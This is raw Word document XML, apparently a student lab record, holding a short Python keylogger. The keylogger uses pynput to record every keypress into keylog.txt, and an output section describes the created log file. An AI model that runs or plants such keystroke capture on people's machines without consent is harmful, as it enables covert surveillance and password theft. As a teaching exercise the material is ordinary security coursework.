          <w:p w14:paraId="58FF87A6" w14:textId="77777777" w:rsidR="002A5719" w:rsidRDefault="002A5719" w:rsidP="0077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700CB" w14:textId="77777777" w:rsidR="002A5719" w:rsidRPr="00BB6EDB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1D4642AA" w14:textId="77777777" w:rsidR="002A5719" w:rsidRPr="00BB6EDB" w:rsidRDefault="002A5719" w:rsidP="002A571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2B784236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3F90CBE9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30EB8FA0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57F1A8C4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6CE45785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EFE6DE0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51C9D4DC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46F7D563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2CC20C29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2B594887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1B402F66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14:paraId="0867130E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7552BFFF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29C9785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4C6D82C9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203F3F14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35639584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486BCC15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6A812761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77D0A7B3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1ABE7AB6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18765530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EAEC757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62221138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4FFB8F86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0BDDD07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ED504C0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1D23FDDD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8CECA89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03CB14B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336A38F7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D182C19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73606274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53ADFA82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547020EC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6CABD373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16DBDB31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B749662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12B9EE31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01F3974F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79006C71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204D147B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48176C9A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45AE3972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47DE9AAA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41E033D7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51318EE7" w14:textId="77777777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</w:p>
    <w:p w14:paraId="75441EEA" w14:textId="2F2F7090" w:rsidR="002A5719" w:rsidRDefault="002A5719" w:rsidP="002A5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</w:p>
    <w:p w14:paraId="49FE0C8B" w14:textId="14AD5B8B" w:rsidR="009E462B" w:rsidRDefault="00727277" w:rsidP="002A5719">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0072727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6B2D3893" wp14:editId="599D90C0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1541780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2912110" cy="3984625"/>
            <wp:effectExtent l="76200" t="76200" r="135890" b="13017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98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5176F" w14:textId="10291F95" w:rsidR="00727277" w:rsidRDefault="00727277" w:rsidP="002A5719">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1212D031" w14:textId="5FD6FBDA" w:rsidR="009E462B" w:rsidRDefault="009E462B" w:rsidP="002A5719">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5588C305" w14:textId="31897068" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="002A5719">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00AA0AB8" w14:textId="1669EC85" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="002A5719">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A35C37" w14:textId="2E15B4A3" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="002A5719">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11BF9CD2" w14:textId="7EEFE254" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="002A5719">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53CA99A4" w14:textId="1E74FC6D" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="002A5719">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09049EE5" w14:textId="77777777" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="002A5719">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F29F66E" w14:textId="77777777" w:rsidR="002A5719" w:rsidRDefault="002A5719" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77EDF4D4" w14:textId="58483801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5996C0E" w14:textId="032A959A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13B9F4DD" w14:textId="7C8C30E5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93CABAB" w14:textId="48D66C31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0A71078A" w14:textId="77777777" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="00E52411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65017402" w14:textId="0769839B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6A77824" w14:textId="3AE489E4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24B207EC" w14:textId="6F0C1184" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="00E52411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  <w:r w:rsidRPr="004832A2"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</w:p>
    <w:p w14:paraId="3D08DEE7" w14:textId="185C17C4" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="00E52411">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2008777F" w14:textId="30E06357" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="00E5241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30067F77" wp14:editId="363435B8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>26054</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4612659</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4801235" cy="2571750"/>
            <wp:effectExtent l="76200" t="76200" r="132715" b="133350"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450628" name="Picture 163245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7C4D83D5" wp14:editId="128FC1B2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-1270</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>844550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4188460" cy="2247900"/>
            <wp:effectExtent l="76200" t="76200" r="135890" b="133350"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450627" name="Picture 163245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AD248" w14:textId="0EB1F1B6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D3D21D9" w14:textId="7D7A7726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4290C5A5" w14:textId="6B232F2F" w:rsidR="006E2B58" w:rsidRDefault="006E2B58" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="627BE596" w14:textId="1214002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5D798BA2" w14:textId="24EE1B22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52007D7C" w14:textId="10B6721B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2473104A" w14:textId="67C2BD4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FED5E88" w14:textId="181AD428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E46A836" w14:textId="348A7FB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A9AFA1D" w14:textId="43A514D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E40D3FF" w14:textId="4811E0F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A9CB4F5" w14:textId="4AB33AF8" w:rsidR="00E52411" w:rsidRPr="00BB6EDB" w:rsidRDefault="00E52411" w:rsidP="00E524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84AD7F" wp14:editId="2F00B68E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36A8" id="Straight Connector 63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11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D71B35" w14:textId="77777777" w:rsidR="00E52411" w:rsidRPr="00BB6EDB" w:rsidRDefault="00E52411" w:rsidP="00E5241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0F3B91EE" w14:textId="77777777" w:rsidR="00E52411" w:rsidRPr="00BB6EDB" w:rsidRDefault="00E52411" w:rsidP="00E52411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68421F" wp14:editId="3FBD859D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1632450624" name="Straight Connector 1632450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2F7BF" id="Straight Connector 163245062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B5A0A7C" w14:textId="77777777" w:rsidR="00E52411" w:rsidRPr="00BB6EDB" w:rsidRDefault="00E52411" w:rsidP="00E5241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E52411" w14:paraId="6D03D7F7" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48512BA3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3D78C092" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47811112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49416C8A" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C80837E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536A7150" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DEDB5F5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066BE16C" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3589E6E6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4B3CAF39" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73B393DE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0F5E0A1F" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="721AF60B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788CED04" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B70022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79E157F6" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="516DBC65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11" w14:paraId="5C641D21" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54F88070" w14:textId="77777777" w:rsidR="00E52411" w:rsidRDefault="00E52411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E7008" w14:textId="77777777" w:rsidR="00E52411" w:rsidRPr="00BB6EDB" w:rsidRDefault="00E52411" w:rsidP="00E52411">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FDC8BBE" w14:textId="77777777" w:rsidR="00E52411" w:rsidRPr="00BB6EDB" w:rsidRDefault="00E52411" w:rsidP="00E5241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371C3D59" w14:textId="76345021" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="00E52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195D1A77" w14:textId="60979F1B" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="00E52411">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23CD0B7E" w14:textId="33BFA74D" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="00E524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283F9A13" wp14:editId="3C6F276E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>27295</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7204473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4265295" cy="2276475"/>
            <wp:effectExtent l="76200" t="76200" r="135255" b="142875"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1632450625" name="Picture 163245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3EA676" w14:textId="364952EA" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="00E52411">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F10D6B" w14:textId="5A81FC4E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7B9132D" w14:textId="22219332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D18A393" w14:textId="35484A5F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159DDAD" w14:textId="5F9A1468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50DBC76" w14:textId="6B03DD2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0E48C6D1" w14:textId="18FFEDB6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2D4F11EC" w14:textId="4D6F440E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092A534" w14:textId="54D886BE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1B61279" w14:textId="10EF7192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CE497B3" w14:textId="789C8790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2809A1D7" w14:textId="149278C5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522FD1DE" w14:textId="0F930340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5F05A50" w14:textId="40C55B0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E42A6BC" w14:textId="0E03702A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4F2A418" w14:textId="5B8E0655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295CE02" w14:textId="780D087A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270B23F0" w14:textId="716E6C27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437F653" w14:textId="61F1A631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0E81900D" w14:textId="1B800BEE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A566EB3" w14:textId="00E17637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480BD66" w14:textId="39EECC58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9222C8E" w14:textId="4F13FC3B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CC0498F" w14:textId="07D2E2E5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0572CE7" w14:textId="6B627F38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CB7775D" w14:textId="656AF38A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530DDD48" w14:textId="55EEFF6D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CC9E47E" w14:textId="784FA530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22812677" w14:textId="4FAD58CE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834ABCE" w14:textId="27AFD6ED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FD51AD1" w14:textId="4D7279C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BB777F4" w14:textId="08819440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E210F19" w14:textId="054D2699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BCE8070" w14:textId="3C22461E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09E8C970" w14:textId="42848DAD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23C0454" w14:textId="037F0C98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C12E348" w14:textId="3BA6269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0240643" w14:textId="31111F25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8E48A02" w14:textId="728F5813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0032B9BB" w14:textId="350BF2E8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26727C0F" w14:textId="110E2225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6409EFC" w14:textId="58201691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20E9D87" w14:textId="65BE309D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C5BD871" w14:textId="7A8B45FB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C08B3B5" w14:textId="553F6340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</w:p>
    <w:p w14:paraId="6D5E57C0" w14:textId="6415C78A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7D10596A" wp14:editId="17C24F37">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-68874</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1610047</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2914650" cy="3141345"/>
            <wp:effectExtent l="76200" t="76200" r="133350" b="135255"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450626" name="Picture 163245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4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B144" w14:textId="387BD754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CFDB57A" w14:textId="12D89403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60E391D5" w14:textId="46DE1DB9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8797E87" w14:textId="3294DDEA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4121940" w14:textId="64A249DD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40F8891D" w14:textId="19B0F19B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34319982" w14:textId="6DDACDAA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E10F0DC" w14:textId="6AF51CBC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585C3907" w14:textId="6504AE90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7FA9AF2A" w14:textId="2BB1CAD5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5EBF087F" w14:textId="61B5D60A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7E118AC" w14:textId="317C4C90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0891EE22" w14:textId="61693C35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1D379D64" w14:textId="799DBA86" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0C6624" w14:textId="6279FB02" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="00E52411">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB6B471" w14:textId="7C9F697E" w:rsidR="00E52411" w:rsidRDefault="00E52411" w:rsidP="0094614E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0A9F0AF3" w14:textId="1273CFA4" w:rsidR="00E52411" w:rsidRDefault="00E5241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FF1855D" w14:textId="6F96493A" w:rsidR="00E52411" w:rsidRDefault="00E5241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3842D6E" w14:textId="30CFBC70" w:rsidR="00E52411" w:rsidRDefault="00E5241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676CDE5E" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRPr="00EA4B95" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B95">
      <w:pPr>
        <w:jc w:val="both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EA4B95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OUTPUT :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA4B95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569BAE7D" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRPr="00EA4B95" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA4B95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">After Executing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA4B95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA4B95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python File KeyLog.txt Is Created </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D81D24B" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRPr="00EA4B95" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA4B95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Open KeyLog.txt and See the Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686D5BC3" w14:textId="51CF70E0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6643D9" w14:textId="1E2A179F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09C645B6" wp14:editId="3FBC060E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-1109</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2224424</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4517390" cy="3780155"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="125095"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1632450631" name="Picture 163245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1-13 12285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78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5A6E9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72112A1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D4B076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827003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10186E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85F8AB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A1A79E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A816AB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7A4F6E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45D001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49942D" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B9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7CE8AF" w14:textId="0F06764F" w:rsidR="00E52411" w:rsidRDefault="00E52411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05F5731E" w14:textId="344E0524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027F53E" w14:textId="07F82A16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6734A4F" w14:textId="1FF69B02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2A55B31" w14:textId="2CA83ADF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4CE74F35" w14:textId="60D6880F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212E7F31" w14:textId="0FD2492E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114E1D0A" w14:textId="7CBCCC5D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1F913C7" w14:textId="7B78AD34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F99A417" w14:textId="2438FE78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986FB97" w14:textId="0A6E99F7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4CDA4D17" w14:textId="1AC7F5DE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2AF4801" w14:textId="296A364A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85E4526" w14:textId="2B1B9A46" w:rsidR="00EA4B95" w:rsidRPr="00BB6EDB" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B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0F96F6" wp14:editId="671F5D11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1632450629" name="Straight Connector 163245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04360" id="Straight Connector 1632450629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12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F8ABD" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRPr="00BB6EDB" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B9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04CA3687" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRPr="00BB6EDB" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B95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423F33" wp14:editId="3D7F623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1632450630" name="Straight Connector 1632450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D347B" id="Straight Connector 1632450630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C9A7F8E" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRPr="00BB6EDB" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B9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EA4B95" w14:paraId="0F908338" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E1C525D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3978FF72" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3606AF1F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1929F684" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71EC8151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1043110C" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79E2E39E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0FB3C612" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77F1BB85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7FC1F343" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EC2519D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2763B902" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E9E3BAA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73C559FF" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37BD49CF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13460D61" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="751A76A2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6080D" w14:textId="1F24B677" w:rsidR="00EA4B95" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B9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7BA51D89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from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pynput.keyboard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import Key  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086AFDB8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from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pynput.keyboard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import Listener  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B943385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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB26822" w14:textId="498AC1AF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keys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= []  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C80B4E" w14:textId="73EAF48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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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functionPerKey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key):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE24FE8" w14:textId="6A7CC626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</w:t>
      </w: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keys.append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key)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ACDA56" w14:textId="420A68C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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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storeKeysToFile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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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keys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)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF529C9" w14:textId="77B28B78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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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storeKeysToFile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(keys):   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EEAC00" w14:textId="2E94CE06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</w:t>
      </w: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with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open('keylog.txt', 'w') as log:      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23494309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    </w:t>
      </w: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for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key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in keys:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E27DB20" w14:textId="0F61DFF4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                      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key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= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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str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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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key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).replace("'", "")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5628B788" w14:textId="188FB510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        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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log.write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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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key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)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22930559" w14:textId="3B9502EB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spellStart"/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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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onEachKeyRelease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key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):    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D40D975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</w:t>
      </w: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if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key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==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Key.esc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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C8BA5F" w14:textId="1CCD752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    </w:t>
      </w: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return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False  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A295FE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with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Listener(  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61160E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on_press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=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functionPerKey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,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2397D654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on_release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=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onEachKeyRelease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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130613AF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) as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listener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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2DD8C5" w14:textId="77777777" w:rsidR="00EA4B95" w:rsidRPr="00EA4B95" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B9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   </w:t>
      </w:r>
      <w:proofErr w:type="spell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_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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listener.join</w:t>
      </w:r>
      <w:proofErr w:type="spell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)</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA4B95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06B7FB63" w14:textId="1AB4F037" w:rsidR="00EA4B95" w:rsidRDefault="00EA4B95" w:rsidP="00EA4B95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB18C3F" w14:textId="0A968E15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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4CD55EFF" w14:textId="30AA2C49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0B71C996" w14:textId="274F2389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22130069" w14:textId="4E03741E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58A70AC" w14:textId="5B116527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45626DF2" w14:textId="6C20C284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FD3277B" w14:textId="229E7852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47AA513" w14:textId="601BA816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200C3A32" w14:textId="102160B7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6B880A12" w14:textId="5CF73A37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13813C8E" w14:textId="5FFCCEA1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008FD56D" w14:textId="28FB6F65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0ED4364" w14:textId="393F4688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4B81A07A" w14:textId="46F656B1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3688D21" w14:textId="0CFB1A1C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18256609" w14:textId="6DC83425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4855738" w14:textId="7A6FC8D8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2D790DF1" w14:textId="1818999D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02C9E552" 